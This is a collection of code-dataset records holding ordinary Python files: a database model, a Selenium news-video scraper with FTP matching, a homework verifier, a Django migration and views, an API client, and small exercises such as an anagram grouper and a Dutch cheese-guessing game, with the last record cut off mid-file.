+{"seq_id":"549379789","text":"import pyodbc\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\nclass DbModel:\n def __init__(self,request):\n\n # creating cursor\n\n self.con_string = 'DSN=%s;UID=%s;PWD=%s;DATABASE=%s;' % (request.registry.settings.get('databse_datasource'), request.registry.settings.get('databse_user'), request.registry.settings.get('databse_password'), request.registry.settings.get('databse_name'))\n\n self.cnxn = pyodbc.connect(self.con_string)\n self.cursor = self.cnxn.cursor()\n\n # Function for getting all program name and id (return dictionary , program id as key and program name as value)\n def fetchPrograms(self):\n\n self.cursor.execute(\"select * from ProgramDetails\")\n programs = {}\n rows = self.cursor.fetchall()\n\n if rows:\n for row in rows:\n programs[row.ProgramId] = row.ProgramName\n\n return programs\n\n # Function for getting all program details id, name ,organization Id, etc (return dictionary )\n def fetchProgramDetails(self):\n\n self.cursor.execute(\"select * from ProgramDetails\")\n programs = {}\n rows = self.cursor.fetchall()\n\n if rows:\n for row in rows:\n programs[row.ProgramId] = {'programName':row.ProgramName, 'organizationId':row.OrganizationId, 'identityProgram':row.IdentityProgram}\n\n return programs\n\n # Function for getting all Carrier Details name and id (return dictionary , Carrier Details id as key and CarrierDetails name as value)\n def fetchCarrierGroups(self):\n\n self.cursor.execute(\"select * from CarrierDetails\")\n carrierGroups = {}\n rows = self.cursor.fetchall()\n\n if rows:\n for row in rows:\n carrierGroups[row.CarrierGroupId] = row.CarrierName\n\n return carrierGroups\n\n","sub_path":"usercentral/models/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"479286103","text":"# -*- coding: utf-8 -*-\nimport os\nimport pickle\nimport re\n\nimport requests\nimport platform\nimport argparse\nimport logging\nfrom time import sleep\nimport traceback\n\nfrom ftplib import FTP\nfrom random import choice\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.common.exceptions import NoSuchElementException, ElementNotInteractableException\nfrom datetime import datetime, timedelta\nimport config_loader\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-u', '--user', required=False)\nparser.add_argument('-p', '--password', required=False)\nargv = parser.parse_args()\n\n## 模拟浏览器 User-Agent\ndesktop_agents = [\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14',\n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'\n]\n\n\n# videos_source( \"popnews\": [, , , ])\nvideos_source = {'popnews': []}\nvideos_source['popnews'].append(['https://hd.stheadline.com/news/realtime/hk/即時-港聞', '港聞', 8, True]) # Pop News 港闻\nvideos_source['popnews'].append(['https://hd.stheadline.com/life/ent/realtime/即時-娛樂', '娛樂', 3, False]) # Pop News 娱乐\nvideos_source['popnews'].append(['https://hd.stheadline.com/news/realtime/wo/即時-國際/', '國際', 6, True]) # Pop News 国际\nvideos_source['popnews'].append(['https://hd.stheadline.com/news/realtime/chi/即時-中國/', '兩岸', 6, True]) # Pop News 两岸\nvideos_source['popnews'].append(['https://hd.stheadline.com/life/food/', '生活', 3, True]) # Pop News 生活\nvideos_source['popnews'].append(['https://hd.stheadline.com/life/health/', '生活', 3, True]) # Pop News 生活\nvideos_source['popnews'].append(['https://hd.stheadline.com/news/realtime/spt/即時-體育/', '體育', 6, True]) # Pop News 体育\nvideos_source['popnews'].append(['https://hd.stheadline.com/news/realtime/pp/即時-地產/', '地產', 6, True]) # Pop News 地產\n\n\n# html 中文内容解码\ndef html_decoder(req):\n if not ('utf-8' in req.apparent_encoding.lower() or 'utf-8' in req.encoding.lower()):\n return req.content.decode('gbk')\n else:\n return req.text\n\n\ndef popnews_ftp_comparor(selen_webdriver, debug_mode=False):\n \"\"\"\n :param selen_webdriver: selenium webdrver\n :param debug_mode:\n :type debug_mode: boolean default False\n True: load video_records from pickle file\n False: run pop_news_handler() to get video_records\n \"\"\"\n ftp_url = '203.80.0.177'\n user = argv.user\n passwd = argv.password\n today_date = (datetime.now() - timedelta(days=0)).strftime(\"%Y%m%d\") # 20180904\n\n if debug_mode:\n with open('test_records.pkl', 'rb') as f:\n video_records = pickle.load(f)\n f.close()\n else:\n video_records = pop_news_handler(selen_webdriver=selen_webdriver)\n # 保存 video_records 测试用途\n with open('test_records.pkl', 'wb') as f:\n pickle.dump(video_records, f)\n f.close()\n\n ftp = FTP(ftp_url)\n ftp.login(user, passwd)\n ftp_mp4_dir = 'headline/%s' % today_date\n print_log(\"遍历FTP服务器: {}\".format(ftp_mp4_dir))\n file_gen = ftp.mlsd(ftp_mp4_dir)\n ftp.dir(ftp_mp4_dir)\n csv_name = os.path.join(mp4_save_path, 'popnews%s.csv' % today_date)\n if os.path.exists(csv_name):\n print_log(\"{} 已存在,删除中\".format(csv_name))\n os.remove(csv_name)\n\n videos_dict = {}\n for fg in file_gen:\n mp4_name = fg[0]\n match_key = mp4_name_match(video_records, mp4_name, fg[1].get(\"size\", \"-1\"))\n if match_key is not None:\n video_title = video_records[match_key][0]\n video_cat = video_records[match_key][1]\n if os.path.exists(csv_name):\n with open(csv_name, 'r', encoding='utf-8') as f:\n f_content = f.read()\n f.close()\n if mp4_name in f_content:\n continue\n else:\n if os.path.exists(csv_name):\n with open(csv_name, 'r', encoding='utf-8') as f:\n f_content = f.read()\n f.close()\n if mp4_name in f_content:\n continue\n video_title = ''\n video_cat = ''\n\n print_log(\"找到视频:{0} 标题:{1} 分类:{2}\".format(mp4_name, video_title, video_cat))\n\n # 保存对应MP4文件名的视频到dict里面\n if not videos_dict.get(video_cat, None):\n videos_dict[video_cat] = {}\n videos_dict[video_cat][mp4_name] = {\"video_title\": video_title}\n\n with open(csv_name, 'w', encoding='utf-8') as f:\n print_log(\"{} 保存中\".format(csv_name))\n write_str = \"\"\n for cat, val in videos_dict.items():\n for video_mp4_name, video_val in val.items():\n write_str += '{0},{1},{2}\\n'.format(video_mp4_name,\n video_val['video_title'].replace(',', ' '),\n cat)\n f.write(write_str)\n f.close()\n print_log(\"{} 已保存\".format(csv_name))\n\n\ndef pop_news_handler(selen_webdriver):\n \"\"\"\n 捉取POPNEWS MP4链接\n :param selen_webdriver: selenium webdrver\n :return: list [视频链接, 视频标题, 视频分类]\n \"\"\"\n video_records = {}\n selen_webdriver.implicitly_wait(20)\n # driver.set_page_load_timeout(30)\n selen_webdriver.maximize_window()\n for source in videos_source['popnews']:\n # 类别页面出错handler 跳过\n try:\n print_log(\"打开 Popnews '{}' 分类网页\".format(source[1]))\n is_rolling_page = source[3]\n selen_webdriver.get(source[0])\n close_ad_window(selen_webdriver)\n if is_rolling_page:\n # 点击载入更多\n load_more_pages(selen_webdriver, source[2])\n news_list = selen_webdriver.find_elements(By.CSS_SELECTOR, \"[class*='instantnews-list']\")\n # 有视频的新闻\n has_video_list = []\n for video in news_list:\n if is_rolling_page:\n has_video = find_element(selen_webdriver, By.CLASS_NAME, \"has-video\", 0, video)\n selen_webdriver.implicitly_wait(10)\n if has_video:\n video_page_url = find_element(selen_webdriver, By.CLASS_NAME, \"has-video\", 0, video).get_attribute(\"href\")\n has_video_list.append(video_page_url)\n else:\n continue\n for has_video_list_url in has_video_list:\n selen_webdriver.get(has_video_list_url)\n selen_webdriver.implicitly_wait(5)\n title = find_element(selen_webdriver, By.CLASS_NAME, \"has-video-txt\").text\n video_link = find_element(selen_webdriver, By.XPATH, \"\"\"//*[@id=\"player2_html5_api\"]\"\"\").get_attribute(\"src\")\n print_log(\"视频标题:{}, 分类:{}, 视频链接:{}\".format(title, source[1], video_link))\n video_records[os.path.basename(video_link)] = [title, source[1], get_url_content_length(video_link)] # 视频链接, 视频标题, 视频分类, 视频大小\n except Exception as err:\n print_log(err)\n continue\n selen_webdriver.close()\n return video_records\n\n\ndef random_headers():\n \"\"\"\n 随机 浏览器 User-Agent\n \"\"\"\n return {'User-Agent': choice(desktop_agents), 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'}\n\n\ndef print_log(log_content, log_level='info'):\n print(log_content)\n if log_level == 'error':\n LOGGER.error(log_content)\n elif log_level == 'debug':\n LOGGER.debug(log_content)\n elif log_level == 'warn':\n LOGGER.warn(log_content)\n else:\n LOGGER.info(log_content)\n\n\ndef mp4_name_match(video_records: dict, name: str, size: str) -> str:\n for key, val in video_records.items():\n if name == key or val[2] == size:\n return key\n return None\n\n\ndef get_url_content_length(url: str) -> int:\n res = requests.head(url, allow_redirects=True)\n return res.headers.get(\"content-length\", -1)\n\n\ndef remove_dul_mp4(in_str: str) -> str:\n if in_str.endswith(\"mp4.mp4\"):\n mat = re.search(r\".*(http[s]?://.*?.mp4)\", in_str)\n return mat.group(1)\n return in_str\n\n\ndef close_ad_window(selen_webdriver: webdriver.Chrome):\n \"\"\"\n 关闭广告弹窗\n :param selen_webdriver: selenium webdrver\n \"\"\"\n ad_close_btn = find_element(selen_webdriver, By.XPATH, \"\"\"//*[@id=\"ad_popup_closebar\"]\"\"\", 10)\n if not ad_close_btn:\n print_log(\"没有广告弹窗\")\n return\n try:\n selen_webdriver.implicitly_wait(3)\n ad_close_btn.click()\n except ElementNotInteractableException:\n print_log(\"广告弹窗已关闭\")\n return\n\n\ndef load_more_pages(selen_webdriver: webdriver.Chrome, num_page: int = 1):\n \"\"\"\n 滚动加载更多页面\n :param selen_webdriver: selenium webdriver\n :param num_page: 需要加载的页面数量不大于15\n \"\"\"\n try:\n for i in range(1, min(num_page, 15)):\n sleep(1)\n # scroll to bottom\n selen_webdriver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n selen_webdriver.find_element(By.CSS_SELECTOR, \"\"\"#but-more-news\"\"\").click()\n except NoSuchElementException as err:\n print_log(\"No more pages button fount\")\n return\n\n\ndef find_element(selen_webdriver: webdriver.Chrome, by: By, value: str, timeout: int = 5, element: WebElement = None) -> WebElement:\n try:\n selen_webdriver.implicitly_wait(timeout)\n if element:\n return element.find_element(by, value)\n else:\n return selen_webdriver.find_element(by, value)\n except NoSuchElementException:\n print_log(\"No element {} found\".format(value), \"debug\")\n return None\n\n\ndef main():\n # 下载对应版本Edge 驱动 https://developer.microsoft.com/en-us/microsoft-edge/tools/webdriver/\n # 下载对应版本Chrome 驱动 https://chromedriver.chromium.org/\n # 放到此目录下\n headless = configs.conf_finder(section, 'headless', val_type=bool)\n if platform.system() == 'Windows':\n if driver_path.endswith(\"MicrosoftWebDriver.exe\") and os.path.exists(driver_path):\n print_log(\"加载Edge驱动\")\n driver = webdriver.Edge(executable_path=driver_path)\n print_log(\"驱动版本: {0}\".format(driver.capabilities['version']))\n elif os.path.exists(driver_path):\n print_log(\"加载Chrome驱动\")\n # options = webdriver.ChromeOptions()\n # options.add_argument('--headless')\n # options.add_argument('--start-maximized')\n # options.binary_location = r'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n driver = webdriver.Chrome(executable_path=driver_path)\n print_log(\"驱动版本: {0}\".format(\n driver.capabilities.get('chrome', dict()).get('chromedriverVersion', \"UNKNOWN\"))\n )\n else:\n print_log('缺少 web driver', log_level='error')\n exit(1)\n elif platform.system() == 'Linux':\n if os.path.exists(driver_path):\n print_log(\"\\u52a0\\u8f7dChrome\\u9a71\\u52a8\")\n options = webdriver.ChromeOptions()\n if headless:\n options.add_argument('headless')\n options.add_argument('window-size=1280x800')\n options.binary_location = '/opt/google/chrome/google-chrome'\n driver = webdriver.Chrome(executable_path=driver_path, chrome_options=options)\n print_log(\"驱动版本: {0}\".format(\n driver.capabilities.get('chrome', dict()).get('chromedriverVersion', \"UNKNOWN\"))\n )\n else:\n print_log('缺少 web driver', log_level='error')\n exit(1)\n elif platform.system() == 'Darwin':\n if os.path.exists(driver_path):\n print_log(\"\\u52a0\\u8f7dChrome\\u9a71\\u52a8\")\n options = webdriver.ChromeOptions()\n if headless:\n options.add_argument('headless')\n options.add_argument('window-size=1280x800')\n driver = webdriver.Chrome(executable_path=driver_path, chrome_options=options)\n print_log(\"驱动版本: {0}\".format(\n driver.capabilities.get('chrome', dict()).get('chromedriverVersion', \"UNKNOWN\"))\n )\n else:\n print_log('缺少 web driver', log_level='error')\n exit(1)\n else:\n print_log(\"OS Platform {} does not support\".format(platform.system()))\n exit(1)\n popnews_ftp_comparor(selen_webdriver=driver, debug_mode=debug_mode)\n driver.quit()\n print_log(\"Program Exit\")\n\n\nif __name__ == '__main__':\n LOGGER = logging.getLogger('popnews_csv')\n LOGGER.setLevel(logging.INFO)\n LOGFILE = 'popnews_csv.log'\n fileHandler = logging.FileHandler(LOGFILE, 'w', 'utf-8')\n LOGFORMAT = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s : %(message)s')\n fileHandler.setFormatter(LOGFORMAT)\n LOGGER.addHandler(fileHandler)\n configs = config_loader.ConfLoader()\n section = \"default\"\n mp4_save_path = configs.conf_finder(section, \"mp4_save_path\", r\"\")\n driver_path = configs.conf_finder(section, \"web_driver_path\")\n debug_mode = configs.conf_finder(section, \"debug\", default_val=False, val_type=bool)\n if not argv.user:\n argv.user = configs.conf_finder(section, \"ftp_user\")\n if not argv.password:\n argv.password = configs.conf_finder(section, \"ftp_pass\")\n main()\n","sub_path":"popnews_csv.py","file_name":"popnews_csv.py","file_ext":"py","file_size_in_byte":14881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"241966941","text":"import random\nimport inspect\n\nclass Time(object):\n def __init__(self, name, slots):\n self.slots = slots\n self.name = name\n\n def slots_reduce(self):\n self.slots -= 1\n return self.slots\n\ndef reducer(times, pick):\n #for i in range(0, len(times)):\n if pick == 'fri' and fri.slots <= 0:\n times.remove(fri.name)\n pick = random.choice(times)\n elif pick == 'fri' and fri.slots > 0:\n fri.slots_reduce()\n if pick == 'sat1' and sat1.slots <= 0:\n times.remove(sat1.name)\n pick = random.choice(times)\n elif pick == 'sat1' and sat1.slots > 0:\n sat1.slots_reduce()\n if pick == 'sat2' and sat2.slots <= 0:\n times.remove(sat2.name)\n pick = random.choice(times)\n elif pick == 'sat2' and sat2.slots > 0:\n sat2.slots_reduce()\n if pick == 'sun1' and sun1.slots <= 0:\n times.remove(sun1.name)\n pick = random.choice(times)\n elif pick == 'sun1' and sun1.slots > 0:\n sun1.slots_reduce()\n if pick == 'sun2' and sun2.slots <= 0:\n times.remove(sun2.name)\n pick = random.choice(times)\n elif pick == 'sun2' and sun2.slots > 0:\n sun2.slots_reduce()\n if pick == 'sun3' and sun3.slots <= 0:\n times.remove(sun3.name)\n pick = random.choice(times)\n elif pick == 'sun3' and sun3.slots > 0:\n sun3.slots_reduce()\n\nif __name__ == '__main__':\n fri = Time(\"fri\",2)\n sat2 = Time(\"sat2\",2)\n sun3 = Time(\"sun3\", 2)\n sat1 = Time(\"sat1\",3)\n sun1 = Time(\"sun1\",3)\n sun2 = Time(\"sun2\",3)\n times = [fri.name, sat1.name, sat2.name, sun1.name, sun2.name, sun3.name]\n #print(times)\n","sub_path":"schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"624485661","text":"import random,argparse,sys,subprocess,os\n\nfrom numpy import cdouble\nparser = argparse.ArgumentParser()\n\ndef run(states,policy,player):\n cmd_encoder = \"python\",\"encoder.py\",\"--policy\",policy,\"--states\",states\n print(\"\\n\",\"Generating the MDP encoding using encoder.py\")\n f = open('verify_attt_mdp','w')\n subprocess.call(cmd_encoder,stdout=f)\n f.close()\n\n cmd_planner = \"python\",\"planner.py\",\"--mdp\",\"verify_attt_mdp\"\n print(\"\\n\",\"Generating the value policy file using planner.py using default algorithm\")\n f = open('verify_attt_planner','w')\n subprocess.call(cmd_planner,stdout=f)\n f.close()\n\n cmd_decoder = \"python\",\"decoder.py\",\"--value-policy\",\"verify_attt_planner\",\"--states\",states ,\"--player-id\",str(player)\n print(\"\\n\",\"Generating the decoded policy file using decoder.py\")\n cmd_output = subprocess.check_output(cmd_decoder,universal_newlines=True)\n\n os.remove('verify_attt_mdp')\n os.remove('verify_attt_planner')\n return cmd_output\n\ndef verifyOutput(states, output, player):\n output = output.split('\\n')\n if output[0] != player:\n print(\"\\n\",\"*\"*10,f\"Mistake: First line of policy file should be the player id, i.e.'{player}'\")\n sys.exit()\n output.remove('')\n with open(states,'r') as file:\n lines = file.readlines()\n states = [line.strip() for line in lines]\n if len(output)-1 != len(states):\n print(\"\\n\",\"*\"*10,f\"Mistake: Expected {len(states)} policy lines, got {len(output)-1}\")\n sys.exit()\n \n policy_states=[]\n for idx,out in enumerate(output[1:]):\n terms = out.split(' ')\n if len(terms) !=10:\n print(\"\\n\",\"*\"*10,f\"Mistake: In line {idx+2}, expected 10 terms , got {len(terms)}. {out}\")\n sys.exit()\n policy_states.append(terms[0])\n try:\n p = list(map(float,terms[1:]))\n except:\n print(\"\\n\",\"*\"*10,f\"Mistake: In line {idx+2}, Number format excpetion. {out}\")\n sys.exit()\n \n states_intersection = set(states).intersection(set(policy_states))\n if len(states_intersection) != len(states):\n print(\"\\n\",\"*\"*10,f\"Mistake: States in policy file and input states file do not match\")\n sys.exit()\n \n print(\"OK\")\n\ndef getPlayerId(policy):\n with open(policy,'r') as file:\n line = file.readline()\n opponent_player = line.strip()\n if opponent_player=='1':\n player = '2'\n else:\n player = '1'\n return player\n\nif __name__ == '__main__':\n parser.add_argument(\"--states\",required=True,type=str,help=\"File with valid states of the player\")\n parser.add_argument(\"--policy\",required=True,type=str,help=\"Policy file of the opponent player\")\n args = parser.parse_args()\n player = getPlayerId(args.policy)\n output = run(args.states,args.policy,player)\n verifyOutput(args.states,output,player)\n\n\n","sub_path":"Assignment2/AtttVerifyOutput.py","file_name":"AtttVerifyOutput.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"471019786","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport denorm.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('test_app', '0004_auto_20160306_1822'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='BaseConcreteModel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ExtendedConcreteModel',\n fields=[\n ('baseconcretemodel_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='test_app.BaseConcreteModel')),\n ('item_count', denorm.fields.CountField(b'relatedmodel_set', default=0)),\n ],\n options={\n },\n bases=('test_app.baseconcretemodel',),\n ),\n migrations.CreateModel(\n name='RelatedModel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('thing', models.ForeignKey(to='test_app.ExtendedConcreteModel')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"test_denorm_project/test_app/migrations/0005_baseconcretemodel_extendedconcretemodel_relatedmodel.py","file_name":"0005_baseconcretemodel_extendedconcretemodel_relatedmodel.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"215084965","text":"def groupAnagrams(strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n def helper(s, t):\n ans = [0] * 26\n for i in s:\n ans[ord(i)- ord('a')] += 1\n for i in t:\n ans[ord(i)- ord('a')] -= 1\n for j in ans:\n if j != 0:\n return False\n return True\n ans = []\n for anag in strs:\n isAnagram = False\n for an in ans:\n if helper(an[0], anag):\n isAnagram = True\n an.append(anag)\n break\n if isAnagram == False:\n ans.append([anag])\n return ans","sub_path":"Qs/49_Group Anagrams.py","file_name":"49_Group Anagrams.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"625891661","text":"print(\"Welkom bij het spel: Wie is het! (maar dan met kaas)\")\nprint(\"Spelregels: Neem een soort kaas in gedachte, en ik zal jouw kaas proberen te raden!\")\nprint(\"Hier komt de eerste vraag..\")\n\n\nantwoord1 = input(\"Is de kaas geel? \")\nif antwoord1 == \"ja\": \n antwoord_a2 : input(\"zitten er gaten in? \")\nelse: antwoord_c2 = input(\"Zitten er blauwe schimmels op?\")\n\nif antwoord_a2 == \"ja\":\n antwoord_a3 : input(\"Is de kaas belachelijk duur? \")\nelse: antwoord_a2 = input(\"Is de kaas zo hard als steen? \")\n\nif antwoord_a3 == \"ja\":\n antwoord_a4 : input(\"Jouw kaas is een Emmenthaler!\")\nif antwoord_a2 == \"ja\":\n antwoord_b4 : input(\"Jouw kaas is een Parmigiano Reggiano!\")\nelse: antwoord_b5 = input(\"Jouw kaas is een Goudse kaas!\")\n\n","sub_path":"wieishet.py","file_name":"wieishet.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"281426538","text":"\"\"\"\n\nExample script for interacting with scidb.\n\n\"\"\"\"\"\n\nimport json\nimport requests\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nusername = '' # we will give you this on the hackathon day\npassword = '' # we will give you this on the hackathon day\nurl = 'https://ugm.scibite.com/api/tie/v1/'\n\n\ndef get_all_datasets(from_type=None, to_type=None):\n \"\"\"\n Return a list of all the data sets captured in SciDB, and optionally limit.\n No parameter call returns all available data sets\n\n :param from_type: type of entity link from e.g. 'DRUG'\n :param to_type: type of entity link to e.g. 'GENE'\n :return:\n \"\"\"\n\n request_url = '{}/retrieve/datasets'.format(url)\n datasets = json.loads(requests.get(request_url, verify=False, auth=(username, password)).text)['hits']\n\n pruned_datasets = []\n\n if from_type or to_type:\n for dataset in datasets:\n try:\n entTypes = [dataset['toType'], dataset['fromType']]\n except KeyError:\n continue\n keep = True\n if from_type:\n if not from_type == entTypes[1]:\n keep = False\n if to_type:\n if not to_type == entTypes[0]:\n keep = False\n if keep:\n pruned_datasets.append(dataset)\n return pruned_datasets\n\n return datasets\n\n\ndef get_linked_entities(entity_type, entity_id, to_type=None, dataset_name=None):\n \"\"\"\n Optionally specify the type of link you are interested in (i.e. the entity\n type that you want to link to). DRUG, GENE, INDICATION, etc.\n\n :param entity_type: string entity type e.g. 'DRUG'\n :param entity_id: string entity ID e.g. 'CHEMBL192'\n :param to_type: set of Strings of entity to link to e.g. ['INDICATION', 'DRUG']\n :param dataset_name: name of the dataset that you wish to limit your associations too e.g. 'Drug drug interactions extracted from drug labels'\n :return:\n \"\"\"\n\n datasets = get_all_datasets()\n\n all_links = []\n for dataset in datasets:\n if dataset_name and dataset['datasetName'] == dataset_name or dataset_name is None:\n try:\n entTypes = [dataset['toType'], dataset['fromType']]\n except KeyError:\n continue\n\n if entity_type == entTypes[0]:\n rel = 'to'\n elif entity_type == entTypes[1]:\n rel = 'from'\n else:\n continue\n\n if to_type:\n if to_type not in entTypes:\n continue\n\n if to_type:\n rel2 = 'toType' if rel == 'from' else 'fromType'\n\n payload = {'dataset': dataset['datasetName'],\n 'q': '{0}:{1}${2}{3}'.format(rel, entity_type, entity_id,\n ' and %s:%s' % (rel2, to_type) if to_type else '')}\n\n request_url = '{}/search/concept'.format(url)\n results = json.loads(requests.get(request_url,\n params=payload,\n verify=False,\n auth=(username, password)).text)\n for link in results['hits']:\n links = {'from': link['from'], 'fromName': link['fromName'], 'to': link['to'], 'toName': link['toName'],\n 'dataset': dataset['datasetName']}\n all_links.append(links)\n\n return all_links\n\n\nprint(get_all_datasets(from_type='DRUG'))\nprint(get_linked_entities('DRUG', 'CHEMBL192', dataset_name='Drug drug interactions extracted from drug labels'))\n","sub_path":"scidb_call.py","file_name":"scidb_call.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"423375168","text":"# -*- coding: utf-8 -*-\nfrom django.http import HttpResponseRedirect, HttpResponse, HttpResponseNotFound\nfrom django.shortcuts import render, render_to_response, get_object_or_404\nfrom django.template.context import RequestContext\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\nfrom django.conf import settings\n\nfrom main.models import Slider, News, Category, Product, ProductImages, Expertise\n\ndef home(request):\n\t#items = Slider.objects.all()\n\t\n\tcategories = Category.objects.all()\n\tctx = {'cat_items':categories}\n\treturn render_to_response('home.html', ctx, context_instance=RequestContext(request))\n\ndef categories(request):\n\tcategories = Category.objects.all()\n\tctx = {'cat_items':categories}\n\treturn render_to_response('categories.html', ctx, context_instance=RequestContext(request))\n\ndef news_view(request):\n\t#items = Slider.objects.all()\n\tnews = News.objects.all()\n\t#categories = Category.objects.all()\n\t\n\tctx = {'news':news,}\n\treturn render_to_response('news.html', ctx, context_instance=RequestContext(request))\n\ndef news_more(request, slug):\n\t#items = Slider.objects.all()\n\t#categories = Category.objects.all()\n\tnews = get_object_or_404(News, slug=slug)\n\t#breadcrumbs = [{'title':'Home', 'url': '/'}, {'title':'News', 'url':'news/'}, {'title':news.title, 'url':'news/'+news.slug}]\n\treturn render_to_response(\"news_more.html\", {'news':news,}, context_instance=RequestContext(request))\n\ndef expertise(request):\n\texpertises = Expertise.objects.all()\n\tctx = {'expertises':expertises,}\n\treturn render_to_response(\"expertise.html\", ctx, context_instance=RequestContext(request))\n\n\ndef expertise_more(request, slug):\n\texpertise = get_object_or_404(Expertise, slug=slug)\n\treturn render_to_response(\"expertise_more.html\", {'expertise':expertise,}, context_instance=RequestContext(request))\n\ndef category(request, slug):\n\t#items = Slider.objects.all()\n\t#categories = Category.objects.all() # for menu items\n\tcategory = get_object_or_404(Category, slug=slug)\n\tproducts = Product.objects.filter(category=category)\n\tpaginator = Paginator(products, settings.PRODUCTS_ON_PAGE) # Show 25 contacts per page\n\tpage = request.GET.get('page')\n\ttry:\n\t\tproducts = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tproducts = paginator.page(1)\n\texcept EmptyPage:\n\t\tproducts = paginator.page(paginator.num_pages)\n\tctx = {'category':category, 'products':products}\n\treturn render_to_response(\"category.html\", ctx, context_instance=RequestContext(request))\n\ndef product(request, slug, title):\n\t#items = Slider.objects.all()\n\t#categories = Category.objects.all() # for menu items\n\n\tcategory = get_object_or_404(Category, slug=slug)\n\tproduct = get_object_or_404(Product, slug=title)\n\tproduct_images = ProductImages.objects.filter(product=product)\n\tctx = {'category':category, 'product':product, 'product_images':product_images,}\n\t# ctx.update(breadcrumbs)\n\treturn render_to_response(\"product.html\", ctx, context_instance=RequestContext(request))\n\n\n\n\n\ndef langredirect(request, lang_code):\n\timport re\n\t\"\"\" \n\tPatched for Get method \n\t\"\"\" \n\t# get lang from url\n\tlang_code = re.split('/lang\\/|\\/', request.path)\n\tlang_code = lang_code[1]\n\tredirect = request.GET.get('next', '')\n\tresponse = HttpResponseRedirect(redirect) \n\tif lang_code : \n\t\tif hasattr(request, 'session'): \n\t\t\trequest.session['django_language'] = lang_code \n\t\telse: \n\t\t\tresponse.set_cookie(settings.LANGUAGE_COOKIE_NAME, lang_code) \n\t\treturn response","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"94526182","text":"from django.shortcuts import render\nfrom django.shortcuts import get_object_or_404\nfrom django.db.models import Q\nfrom django.core.paginator import Paginator\nfrom .models import *\n\n# Create your views here.\n\ndef home(request):\n queryset = request.GET.get(\"search\")\n posts = Post.objects.filter(state=True)\n if queryset:\n posts = Post.objects.filter(\n Q(title__icontains = queryset)|\n Q(description__icontains = queryset)\n ).distinct()\n\n paginator = Paginator(posts,2)\n page = request.GET.get('page')\n posts = paginator.get_page(page)\n\n context = {\n 'title':'Home',\n 'image':'img/home-bg.jpg',\n 'posts':posts\n }\n\n return render(request, 'index.html', context)\n\ndef programming(request):\n posts = Post.objects.filter(\n state=True,\n category = Category.objects.get(name='Programming')\n )\n context = {\n 'title':'Home',\n 'image':'img/programming.jpg',\n 'posts':posts\n }\n return render(request, 'programming.html', context)\n\ndef articles(request):\n posts = Post.objects.filter(\n 